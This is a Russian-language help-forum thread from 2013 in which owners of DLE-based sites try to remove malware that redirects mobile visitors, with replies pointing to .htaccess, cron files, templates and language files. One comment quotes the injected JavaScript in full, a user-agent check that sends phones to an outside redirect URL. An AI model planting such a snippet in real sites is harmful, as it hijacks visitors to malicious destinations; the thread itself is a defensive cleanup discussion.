Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Вирус на сайте (редирект)

Вирус на сайте (редирект)


     09.10.2013    Все вопросы » Общие вопросы    12387

вопрос
Добрый день всем форумчанам.
На сайте появился вирус - происходит редирект на мобильные устройства или на сайт infected.com.
Что сделал:
Удалили везде скрипты и ссылки на FTP.
Изменил пароли на ftp, админке и на сервере.
Визуально ссылок и скриптов не вижу, но яндек все равно ругается что есть вирус.
При запросе уточнения прислали письмо:
"В настоящее время при заходе на сайт через браузер Opera Mobile происходит перенаправление на вредоносную цель refresh-browser.00xff.net . Проверьте, пожалуйста.
Вредоносный код находится на серверной стороне Вашего сайта, поэтому я не могу указать Вам на него. Советую обратиться в техническую поддержку Вашего хостинг-провайдера."

Вот сам пациент - med-na-dom.com

Кто понимает и может помочь - прошу подсказать где искать вирус и как его убрать.
Бьюсь над этой проблемой уже более месяца.
С уважением Дмитрий.
Заранее благодарю.

Ответил: dj-avtosh


в файле .htaccess лишнее ( файл в корне )

17 комментариев

coolteams
Юзер

coolteams - 9 октября 2013 23:58 -

так в мобильном шаблоне и ищите, и еще переименуйте файл cron.php если двиг нуленый, через него опять зальют.

xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:50 -

dj-avtosh спасибо, надеюсь что нашел правильно и удалил. Посмотрю что скажет Яндекс.

xpchelkinx
Юзер

xpchelkinx - 10 октября 2013 10:53 -

coolteams спасибо за замечание. подскажите как правильно переименовать cron.php?
Просто переименовать и все?
Или этот файл с чем то связан?
В сети не нашел ответа на данный вопрос.

dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 00:13 -

При чем тут крон, казалось бы. Бесят уже непроверенные советы.

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

coolteams
Юзер

coolteams - 11 октября 2013 03:52 -

При том крон! В нуленом двигле в крон запихивают код, которым заливают вирус. Ко мне уже раз сто обращались, чистили полностью все файло, перезаливали, на завтра опять тоже самое, пока крон не переименовали. Бесят когда от балды отписывают, и делают себя умнее всех. 7 лет работы с DLE меня многому научили, если что.
cron-32xnzvsu.php и все дела.

dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:43 -

1. 7 лет работы с ДЛЕ? :D

2. И вы до сих пор не знаете про айболит и т.п.?

3. Вам чуждо что файлы не переименовываются. А поднимаются логи и латаются дыры.

4. Джумлу Вы тоже будете переименовывать?

5. Да, я умнее Вас. Проверено.

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 16:46 -

Я Вам на будущее советую внимательно читать вопрос, что бы верно отвечать. Человек, который имеет опыт очистки сайта от вирусов, обязан знать что вирус по обновлению мобильного браузера ( ИМХО опера и т.п. ) прописывает себя в .htaccess

Это сделано только для того, что бы вирус обрабатывался с любой страницы.

Удачи, надеюсь скоро отметите юбилей с ДЛЕ :D

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

coolteams
Юзер

coolteams - 11 октября 2013 17:18 -

dj-avtosh я вот читаю ваши сообщения, ни одного! ответа по существу, левые отписки. Нет желания даже с вами спорить, кто умнее.
..и все сообщения ради рекламной подписи.

dj-avtosh
PHP-developer

dj-avtosh - 11 октября 2013 17:20 -

Вы отписываетесь на сайте, который мы писали при отсутствии логики.

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

coolteams
Юзер

coolteams - 11 октября 2013 17:33 -

поздравляю, вовесьте баннер сверху

xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 10:56 -

Ответил: dj-avtosh
в файле .htaccess лишнее ( файл в корне )

Я вроде бы удалил, но Яндекс продолжает ругаться. Прошу Вас указать на вредоносный код в htaccess по вашему мнению.
С уважением Дмитрий.

dj-avtosh
PHP-developer

dj-avtosh - 14 октября 2013 11:08 -

Надо в вебмастере задать заявку на переиндексацию и ждать.

https://elkhan.ru
По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

xpchelkinx
Юзер

xpchelkinx - 14 октября 2013 14:24 -

dj-avtosh Дал, ответ пришел что код все еще есть.
По этому и повторно обратился к Вам.

Engel
Юзер

Engel - 16 ноября 2013 21:08 -

Кто поможет? Похожая ситуация, только код немножко другой:

<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://webtds1.ru/go.php?sid=1";
}
//-->
</script>

Появляется в шаблоне Smartphone - main.tpl . Быди проверены все файлы и папки сайта (конечно же и .htaccess), все чисто. Удаляю код и через некоторое время (от 4 до 6 часов) код прописывается в шаблоне опять. Яндекс уже второй раз вешает свою метку на сайт.

Помогите, люди добрые!

ПафНутиЙ
Админ

ПафНутиЙ - 17 ноября 2013 00:45 -

Возможно вредоносный код есть в файлах, выполняющихся по крону.

Каков вопрос - таков и ответ. Просто помните об этом.

bembelby
Юзер

bembelby - 17 ноября 2013 10:29 -

Раньше подобный код перенаправления на мобильные устройства я находил у себя нак сайте в файлах website.lng, engine.php, init.php, dbconfig.php

Gabr
Юзер

Gabr - 29 ноября 2013 19:01 -

Столкнулся с такой же бедой, практически - перелопатил все вышеуказанные файлы. Перепробовал все возможные методы от онлайн сервисов до заливания некоторых утилит, сайт Др.Веб все равно ругался и показывал, что есть "вредный" редирект.
Только в website.lng был код. Удалил - все стало замечательно.

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх